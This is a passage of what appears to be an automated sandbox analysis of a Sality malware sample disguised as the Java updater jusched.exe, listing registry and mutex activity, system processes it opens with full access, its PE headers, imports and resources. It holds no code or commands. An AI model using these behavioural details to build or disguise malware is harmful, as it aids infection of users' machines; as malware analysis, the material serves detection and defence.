1762 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} SaferFlags success or wait 1
1767 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers DefaultLevel success or wait 1
1761 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers PolicyScope success or wait 1
1769 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Cache buffer overflow 1
1763 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Cache success or wait 1
2191 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers LogFileName object name not found 1
[ Mutexes Created ]
Reputation Name Completion Count
8 \BaseNamedObjects\Op1mutx9 success or wait 1
3155 \BaseNamedObjects\CTF.LBES.MutexDefaultS-1-5-21-220523388-1935655697-1343024091-1003 object name exists 1
3156 \BaseNamedObjects\CTF.Compart.MutexDefaultS-1-5-21-220523388-1935655697-1343024091-1003 object name exists 1
3158 \BaseNamedObjects\CTF.Asm.MutexDefaultS-1-5-21-220523388-1935655697-1343024091-1003 object name exists 1
3156 \BaseNamedObjects\CTF.Layouts.MutexDefaultS-1-5-21-220523388-1935655697-1343024091-1003 object name exists 1
3156 \BaseNamedObjects\CTF.TMD.MutexDefaultS-1-5-21-220523388-1935655697-1343024091-1003 object name exists 1
3054 \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-220523388-1935655697-1343024091-1003MUTEX.DefaultS-1-5-21-220523388-1935655697-1343024091-1003 object name exists 1
4 \BaseNamedObjects\SunJavaUpdateSchedulerMutex success or wait 1
16 \BaseNamedObjects\smss.exeM_368_ success or wait 2
16 \BaseNamedObjects\csrss.exeM_808_ success or wait 2
16 \BaseNamedObjects\winlogon.exeM_832_ success or wait 2
16 \BaseNamedObjects\services.exeM_876_ success or wait 2
16 \BaseNamedObjects\lsass.exeM_888_ success or wait 2
14 \BaseNamedObjects\svchost.exeM_1068_ success or wait 2
20 \BaseNamedObjects\svchost.exeM_1140_ success or wait 2
14 \BaseNamedObjects\svchost.exeM_1356_ success or wait 2
20 \BaseNamedObjects\svchost.exeM_1400_ success or wait 2
20 \BaseNamedObjects\svchost.exeM_1604_ success or wait 2
14 \BaseNamedObjects\spoolsv.exeM_1888_ success or wait 2
14 \BaseNamedObjects\explorer.exeM_2036_ success or wait 1
14 \BaseNamedObjects\ctfmon.exeM_424_ success or wait 1
20 \BaseNamedObjects\svchost.exeM_1652_ success or wait 2
7 \BaseNamedObjects\wscntfy.exeM_1300_ success or wait 1
20 \BaseNamedObjects\alg.exeM_1448_ success or wait 2
4 \BaseNamedObjects\jusched.win32_sality_nao.exeM_620_ success or wait 2
82 \BaseNamedObjects\Op1mutx9 object name exists 2
16255 no name success or wait 2
13 \BaseNamedObjects\smss.exeM_368_ object name exists 1
13 \BaseNamedObjects\csrss.exeM_808_ object name exists 1
13 \BaseNamedObjects\winlogon.exeM_832_ object name exists 1
13 \BaseNamedObjects\services.exeM_876_ object name exists 1
13 \BaseNamedObjects\lsass.exeM_888_ object name exists 1
13 \BaseNamedObjects\svchost.exeM_1068_ object name exists 1
13 \BaseNamedObjects\svchost.exeM_1356_ object name exists 1
13 \BaseNamedObjects\spoolsv.exeM_1888_ object name exists 1
13 \BaseNamedObjects\explorer.exeM_2036_ object name exists 1
13 \BaseNamedObjects\ctfmon.exeM_424_ object name exists 1
13 \BaseNamedObjects\wscntfy.exeM_1300_ object name exists 1
0 \BaseNamedObjects\jusched.win32_sality_nao.exeM_620_ object name exists 1
[ Processes Opened ]
Reputation PID Access Filepath Cmdline Completion Count
4 620 query information C:\jusched.win32_sality_NAO.exe C:\jusched.win32_sality_NAO.exe success or wait 1
558 not known terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume not known not known access denied 18
23 368 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\System32\smss.exe \SystemRoot\System32\smss.exe success or wait 1
13 808 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\csrss.exe C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024 3072 512 Windows=On SubSystemType=Windows ServerDll=basesrv 1 ServerDll=winsrv:UserServerDllInitialization 3 ServerDll=winsrv:ConServerDllInitialization 2 ProfileControl=Off MaxRequestThreads=16 success or wait 1
25 832 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\winlogon.exe winlogon.exe success or wait 1
75 876 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\services.exe success or wait 1
15 888 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\lsass.exe success or wait 1
18 1068 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\svchost -k DcomLaunch success or wait 1
55 1140 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\svchost -k rpcss success or wait 2
11 1356 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs success or wait 1
22 1400 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\svchost.exe -k NetworkService success or wait 2
55 1604 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\svchost.exe -k LocalService success or wait 2
9 1888 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\spoolsv.exe C:\WINDOWS\system32\spoolsv.exe success or wait 1
78 2036 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\explorer.exe C:\WINDOWS\Explorer.EXE success or wait 1
445 424 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\ctfmon.exe C:\WINDOWS\system32\ctfmon.exe success or wait 1
55 1652 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\svchost.exe -k LocalService success or wait 2
12 1300 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\system32\wscntfy.exe success or wait 1
21 1448 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\WINDOWS\System32\alg.exe C:\WINDOWS\System32\alg.exe success or wait 2
6 620 terminate and create thread and set session id and vm operation and vm read and vm write and dupclicate handle and create process and set quota and set information and query information and set port or suspend or resume C:\jusched.win32_sality_NAO.exe C:\jusched.win32_sality_NAO.exe success or wait 1
####################
# PE Information
####################
->DOS Header
e_magic: 0x5A4D
e_cblp: 0x0090
e_cp: 0x0003
e_crlc: 0x0000
e_cparhdr: 0x0004
e_minalloc: 0x0000
e_maxalloc: 0xFFFF
e_ss: 0x0000
e_sp: 0x00B8
e_csum: 0x0000
e_ip: 0x0000
e_cs: 0x0000
e_lfarlc: 0x0040
e_ovno: 0x0000
e_res: 0x0000000000000000
e_oemid: 0x0000
e_oeminfo: 0x0000
e_res2: 0x0000000000000000000000000000000000000000
e_lfanew: 0x000000F0
->File Header
Machine: 0x014C (I386)
NumberOfSections: 0x0005
TimeDateStamp: 0x4B7D6E1C (GMT: Thu Feb 18 16:43:08 2010)
PointerToSymbolTable: 0x00000000
NumberOfSymbols: 0x00000000
SizeOfOptionalHeader: 0x00E0
Characteristics: 0x0103
(RELOCS_STRIPPED)
(EXECUTABLE_IMAGE)
(32BIT_MACHINE)
->Optional Header
Magic: 0x010B (HDR32_MAGIC)
MajorLinkerVersion: 0x09
MinorLinkerVersion: 0x00 -> 9.00
SizeOfCode: 0x0002B000
SizeOfInitializedData: 0x0000FE00
SizeOfUninitializedData: 0x00000000
AddressOfEntryPoint: 0x0001518C
BaseOfCode: 0x00001000
BaseOfData: 0x0002C000
ImageBase: 0x00400000
SectionAlignment: 0x00001000
FileAlignment: 0x00000200
MajorOperatingSystemVersion: 0x0005
MinorOperatingSystemVersion: 0x0000 -> 5.00
MajorImageVersion: 0x0000
MinorImageVersion: 0x0000 -> 0.00
MajorSubsystemVersion: 0x0005
MinorSubsystemVersion: 0x0000 -> 5.00
Win32VersionValue: 0x00000000
SizeOfImage: 0x0004F000
SizeOfHeaders: 0x00000400
CheckSum: 0x00000000
Subsystem: 0x0002 (WINDOWS_GUI)
DllCharacteristics: 0x8000 (TERMINAL_SERVER_AWARE)
SizeOfStackReserve: 0x00100000
SizeOfStackCommit: 0x00001000
SizeOfHeapReserve: 0x00100000
SizeOfHeapCommit: 0x00001000
LoaderFlags: 0x00000000
NumberOfRvaAndSizes: 0x00000010
DataDirectory (16) RVA Size
------------- ---------- ----------
ExportTable 0x00000000 0x00000000
ImportTable 0x00036294 0x000000B4 (".rdata")
Resource 0x0003D000 0x00002440 (".rsrc")
Exception 0x00000000 0x00000000
Security 0x0003B200 0x000016E8 (".data")
Relocation 0x00000000 0x00000000
Debug 0x0002C390 0x0000001C (".rdata")
Copyright 0x00000000 0x00000000
GlobalPtr 0x00000000 0x00000000
TLSTable 0x00000000 0x00000000
LoadConfig 0x000339A0 0x00000040 (".rdata")
BoundImport 0x00000000 0x00000000
IAT 0x0002C000 0x0000031C (".rdata")
DelayImport 0x00000000 0x00000000
COM 0x00000000 0x00000000
Reserved 0x00000000 0x00000000
###################
# Imports
###################
->Import Table
1. ImageImportDescriptor:
OriginalFirstThunk: 0x00036348
TimeDateStamp: 0x00000000 (GMT: Thu Jan 01 00:00:00 1970)
ForwarderChain: 0x00000000
Name: 0x000367DC ("ADVAPI32.dll")
FirstThunk: 0x0002C000
Ordinal/Hint API name
------------ ---------------------------------------
0x022A "RegCloseKey"
0x025A "RegOpenKeyExA"
0x0267 "RegQueryValueExA"
0x0257 "RegNotifyChangeKeyValue"
0x0237 "RegDeleteKeyA"
0x0241 "RegDeleteValueA"
0x0232 "RegCreateKeyExA"
0x0277 "RegSetValueExA"
0x0261 "RegQueryInfoKeyA"
0x0248 "RegEnumKeyExA"
0x02B0 "SetSecurityDescriptorDacl"
0x0171 "InitializeSecurityDescriptor"
0x00B2 "CryptDestroyHash"
0x00C0 "CryptGetHashParam"
0x00C4 "CryptHashData"
0x00C7 "CryptReleaseContext"
0x00AF "CryptCreateHash"
0x00AC "CryptAcquireContextA"
0x0247 "RegEnumKeyA"
2. ImageImportDescriptor:
OriginalFirstThunk: 0x00036398
TimeDateStamp: 0x00000000 (GMT: Thu Jan 01 00:00:00 1970)
ForwarderChain: 0x00000000
Name: 0x000367FC ("GDI32.dll")
FirstThunk: 0x0002C050
Ordinal/Hint API name
------------ ---------------------------------------
0x01F4 "GetStockObject"
3. ImageImportDescriptor:
OriginalFirstThunk: 0x00036610
TimeDateStamp: 0x00000000 (GMT: Thu Jan 01 00:00:00 1970)
ForwarderChain: 0x00000000
Name: 0x0003690E ("WININET.dll")
FirstThunk: 0x0002C2C8
Ordinal/Hint API name
------------ ---------------------------------------
0x006A "InternetCloseHandle"
0x005A "HttpSendRequestA"
0x0056 "HttpOpenRequestA"
0x009E "InternetReadFile"
0x009A "InternetQueryDataAvailable"
0x0058 "HttpQueryInfoA"
0x0070 "InternetConnectA"
0x0096 "InternetOpenA"
0x0072 "InternetCrackUrlA"
0x007B "InternetErrorDlg"
0x00BA "InternetTimeToSystemTime"
0x00B7 "InternetTimeFromSystemTime"
4. ImageImportDescriptor:
OriginalFirstThunk: 0x000363A0
TimeDateStamp: 0x00000000 (GMT: Thu Jan 01 00:00:00 1970)
ForwarderChain: 0x00000000
Name: 0x00036D2C ("KERNEL32.dll")
FirstThunk: 0x0002C058
Ordinal/Hint API name
------------ ---------------------------------------
0x03CD "SetEndOfFile"
0x007F "CreateFileW"
0x03D0 "SetEnvironmentVariableA"
0x0055 "CompareStringW"
0x0052 "CompareStringA"
0x01EA "GetLocaleInfoW"
0x03FC "SetStdHandle"
0x048C "WriteConsoleW"
0x0199 "GetConsoleOutputCP"
0x0482 "WriteConsoleA"
0x02DD "IsValidLocale"
0x00F8 "EnumSystemLocalesA"
0x01E8 "GetLocaleInfoA"
0x026D "GetUserDefaultLCID"
0x035A "RaiseException"
0x02B4 "InitializeCriticalSection"
0x00BE "DeleteCriticalSection"
0x04B5 "lstrlenA"
0x04A9 "lstrcmpA"
0x0043 "CloseHandle"
0x01E6 "GetLastError"
0x0094 "CreateProcessA"
0x008B "CreateMutexA"
0x0072 "CreateEventA"
0x04A6 "lstrcatA"
0x031A "MultiByteToWideChar"
0x047A "WideCharToMultiByte"
0x04B6 "lstrlenW"
0x02C0 "InterlockedIncrement"
0x02BC "InterlockedDecrement"
0x04AC "lstrcmpiA"
0x0462 "WaitForMultipleObjects"
0x01F4 "GetModuleFileNameA"
0x0464 "WaitForSingleObject"
0x016F "GetCommandLineA"
0x02CF "IsDBCSLeadByte"
0x014C "FreeLibrary"
0x0420 "SizeofResource"
0x02F6 "LoadResource"
0x0136 "FindResourceA"
0x02F2 "LoadLibraryExA"
0x01F6 "GetModuleHandleA"
0x025F "GetThreadLocale"
0x025A "GetTempPathA"
0x04AF "lstrcpyA"
0x03D3 "SetEvent"
0x038A "ResetEvent"
0x00A3 "CreateThread"
0x04B2 "lstrcpynA"
0x0368 "ReadFile"
0x03E9 "SetHandleInformation"
0x0091 "CreatePipe"
0x048D "WriteFile"
0x0421 "Sleep"
0x0078 "CreateFileA"
0x0220 "GetProcAddress"
0x02F1 "LoadLibraryA"
0x0327 "OpenEventA"
0x024D "GetSystemTime"
0x00C0 "DeleteFileA"
0x0275 "GetVersionExA"
0x01A9 "GetCurrentProcess"
0x0249 "GetSystemInfo"
0x03DF "SetFilePointer"
0x01C2 "GetEnvironmentVariableA"
0x02FD "LocalFree"
0x042B "SystemTimeToTzSpecificLocalTime"
0x0051 "CompareFileTime"
0x042A "SystemTimeToFileTime"
0x0266 "GetTickCount"
0x01AA "GetCurrentProcessId"
0x00D9 "EnterCriticalSection"
0x02EF "LeaveCriticalSection"
0x0240 "GetStringTypeW"
0x023D "GetStringTypeA"
0x02E3 "LCMapStringW"
0x02E1 "LCMapStringA"
0x0354 "QueryPerformanceCounter"
0x01C1 "GetEnvironmentStringsW"
0x014B "FreeEnvironmentStringsW"
0x0223 "GetProcessHeap"
0x01BF "GetEnvironmentStrings"
0x014A "FreeEnvironmentStringsA"
0x02B5 "InitializeCriticalSectionAndSpinCount"
0x02BD "InterlockedExchange"
0x0141 "FlushFileBuffers"
0x0195 "GetConsoleMode"
0x0183 "GetConsoleCP"
0x01D7 "GetFileType"
0x03E8 "SetHandleCount"
0x02A6 "HeapSize"
0x023B "GetStdHandle"
0x029F "HeapCreate"
0x02A4 "HeapReAlloc"
0x0457 "VirtualFree"
0x02DB "IsValidCodePage"
0x0213 "GetOEMCP"
0x0152 "GetACP"
0x015B "GetCPInfo"
0x01AD "GetCurrentThreadId"
0x03EC "SetLastError"
0x0433 "TlsFree"
0x0435 "TlsSetValue"
0x0432 "TlsAlloc"
0x0434 "TlsGetValue"
0x026B "GetTimeZoneInformation"
0x0239 "GetStartupInfoA"
0x0104 "ExitProcess"
0x02D1 "IsDebuggerPresent"
0x0415 "SetUnhandledExceptionFilter"
0x043E "UnhandledExceptionFilter"
0x042D "TerminateProcess"
0x045C "VirtualQuery"
0x01F9 "GetModuleHandleW"
0x0454 "VirtualAlloc"
0x024F "GetSystemTimeAsFileTime"
0x0392 "RtlUnwind"
0x029D "HeapAlloc"
0x02A1 "HeapFree"
0x045A "VirtualProtect"
5. ImageImportDescriptor:
OriginalFirstThunk: 0x00036598
TimeDateStamp: 0x00000000 (GMT: Thu Jan 01 00:00:00 1970)
ForwarderChain: 0x00000000
Name: 0x00036F2C ("USER32.dll")
FirstThunk: 0x0002C250
Ordinal/Hint API name
------------ ---------------------------------------
0x0307 "wsprintfA"
0x002D "CharNextA"
0x021B "PeekMessageA"
0x00A8 "DispatchMessageA"
0x00A9 "DispatchMessageW"
0x02D5 "TranslateMessage"
0x014A "GetMessageA"
0x01C9 "IsWindowUnicode"
0x0206 "MsgWaitForMultipleObjects"
0x01E3 "LoadStringA"
0x011C "GetDesktopWindow"
0x01F8 "MessageBoxA"
0x0233 "RegisterClassA"
0x0067 "CreateWindowExA"
0x02B8 "ShowWindow"
0x02A4 "SetWindowLongA"
0x00A0 "DestroyWindow"
0x0181 "GetWindowLongA"
0x0095 "DefWindowProcA"
0x0220 "PostQuitMessage"
0x0065 "CreatePopupMenu"
0x0009 "AppendMenuA"
0x0119 "GetCursorPos"
0x027A "SetForegroundWindow"
0x02CF "TrackPopupMenu"
0x021E "PostMessageA"
0x016F "GetSystemMetrics"
0x01D8 "LoadImageA"
0x014E "GetMessageW"
6. ImageImportDescriptor:
OriginalFirstThunk: 0x00036644
TimeDateStamp: 0x00000000 (GMT: Thu Jan 01 00:00:00 1970)
ForwarderChain: 0x00000000
Name: 0x00036FB6 ("ole32.dll")
FirstThunk: 0x0002C2FC
Ordinal/Hint API name
------------ ---------------------------------------
0x0068 "CoTaskMemRealloc"
0x0010 "CoCreateInstance"
0x0008 "CLSIDFromString"
0x003D "CoInitialize"
0x006B "CoUninitialize"
0x0067 "CoTaskMemFree"
0x0066 "CoTaskMemAlloc"
7. ImageImportDescriptor:
OriginalFirstThunk: 0x0003658C
TimeDateStamp: 0x00000000 (GMT: Thu Jan 01 00:00:00 1970)
ForwarderChain: 0x00000000
Name: 0x00036FE4 ("SHELL32.dll")
FirstThunk: 0x0002C244
Ordinal/Hint API name
------------ ---------------------------------------
0x0122 "Shell_NotifyIconA"
0x0114 "ShellExecuteA"
8. ImageImportDescriptor:
OriginalFirstThunk: 0x00036584
TimeDateStamp: 0x00000000 (GMT: Thu Jan 01 00:00:00 1970)
ForwarderChain: 0x00000000
Name: 0x00036FF0 ("OLEAUT32.dll")
FirstThunk: 0x0002C23C
Ordinal/Hint API name
------------ ---------------------------------------
0x0115
##################
# Resources
##################
->Resource Tree (detailed dump)
[Resource Directory (0)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0005
---------------------------------------------------------
[ResourceEntry]:
Name/Id: 0x00000003 (ICON)
OffsetToData: 0x80000038 (DATA_IS_DIRECTORY)
[Resource Directory (1)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0003
[ResourceEntry]:
Name/Id: 0x00000001
OffsetToData: 0x800000C8 (DATA_IS_DIRECTORY)
[Resource Directory (2)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0001
[ResourceEntry]:
Name/Id: 0x00000409
OffsetToData: 0x00000218
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003D3B8
Size: 0x00000128
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000002
OffsetToData: 0x800000E0 (DATA_IS_DIRECTORY)
[Resource Directory (2)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0001
[ResourceEntry]:
Name/Id: 0x00000409
OffsetToData: 0x00000228
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003D4E0
Size: 0x00000568
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000003
OffsetToData: 0x800000F8 (DATA_IS_DIRECTORY)
[Resource Directory (2)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0001
[ResourceEntry]:
Name/Id: 0x00000409
OffsetToData: 0x00000238
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003DA48
Size: 0x00000468
CodePage: 0x000004E4
Reserved: 0x00000000
---------------------------------------------------------
[ResourceEntry]:
Name/Id: 0x00000006 (STRING TABLE)
OffsetToData: 0x80000060 (DATA_IS_DIRECTORY)
[Resource Directory (1)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0002
[ResourceEntry]:
Name/Id: 0x00000007
OffsetToData: 0x80000110 (DATA_IS_DIRECTORY)
[Resource Directory (2)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x000A
[ResourceEntry]:
Name/Id: 0x00000007
OffsetToData: 0x00000248
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003DEB0
Size: 0x00000128
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x0000000A
OffsetToData: 0x00000258
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003DFD8
Size: 0x0000010C
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x0000000C
OffsetToData: 0x00000268
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E0E4
Size: 0x000000F4
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000010
OffsetToData: 0x00000278
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E1D8
Size: 0x000000F6
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x0000001D
OffsetToData: 0x00000288
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E2D0
Size: 0x000000EC
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000404
OffsetToData: 0x00000298
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E3BC
Size: 0x000000AC
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000409
OffsetToData: 0x000002A8
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E468
Size: 0x000000DE
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000411
OffsetToData: 0x000002B8
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E548
Size: 0x000000E0
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000412
OffsetToData: 0x000002C8
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E628
Size: 0x000000C2
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000804
OffsetToData: 0x000002D8
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E6EC
Size: 0x000000AC
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000008
OffsetToData: 0x80000170 (DATA_IS_DIRECTORY)
[Resource Directory (2)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x000A
[ResourceEntry]:
Name/Id: 0x00000007
OffsetToData: 0x000002E8
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E798
Size: 0x000000EA
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x0000000A
OffsetToData: 0x000002F8
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E884
Size: 0x000000FC
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x0000000C
OffsetToData: 0x00000308
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003E980
Size: 0x0000010A
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000010
OffsetToData: 0x00000318
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003EA8C
Size: 0x000000FA
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x0000001D
OffsetToData: 0x00000328
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003EB88
Size: 0x000000DC
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000404
OffsetToData: 0x00000338
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003EC64
Size: 0x00000078
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000409
OffsetToData: 0x00000348
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003ECDC
Size: 0x000000D6
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000411
OffsetToData: 0x00000358
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003EDB4
Size: 0x0000008A
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000412
OffsetToData: 0x00000368
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003EE40
Size: 0x0000009A
CodePage: 0x000004E4
Reserved: 0x00000000
[ResourceEntry]:
Name/Id: 0x00000804
OffsetToData: 0x00000378
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003EEDC
Size: 0x00000070
CodePage: 0x000004E4
Reserved: 0x00000000
---------------------------------------------------------
[ResourceEntry]:
Name/Id: 0x0000000E (GROUP ICON)
OffsetToData: 0x80000080 (DATA_IS_DIRECTORY)
[Resource Directory (1)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0001
[ResourceEntry]:
Name/Id: 0x000000CA
OffsetToData: 0x800001D0 (DATA_IS_DIRECTORY)
[Resource Directory (2)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0001
[ResourceEntry]:
Name/Id: 0x00000409
OffsetToData: 0x00000388
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003EF4C
Size: 0x00000030
CodePage: 0x000004E4
Reserved: 0x00000000
---------------------------------------------------------
[ResourceEntry]:
Name/Id: 0x00000010 (VERSION INFORMATION)
OffsetToData: 0x80000098 (DATA_IS_DIRECTORY)
[Resource Directory (1)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0001
[ResourceEntry]:
Name/Id: 0x00000001
OffsetToData: 0x800001E8 (DATA_IS_DIRECTORY)
[Resource Directory (2)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0001
[ResourceEntry]:
Name/Id: 0x00000000
OffsetToData: 0x00000398
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003EF7C
Size: 0x00000368
CodePage: 0x000004E4
Reserved: 0x00000000
---------------------------------------------------------
[ResourceEntry]:
Name/Id: 0x00000018
OffsetToData: 0x800000B0 (DATA_IS_DIRECTORY)
[Resource Directory (1)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0001
[ResourceEntry]:
Name/Id: 0x00000001
OffsetToData: 0x80000200 (DATA_IS_DIRECTORY)
[Resource Directory (2)]:
Characteristics: 0x00000000
TimeDateStamp: 0x00000000 (Thu Jan 01 00:00:00 1970)
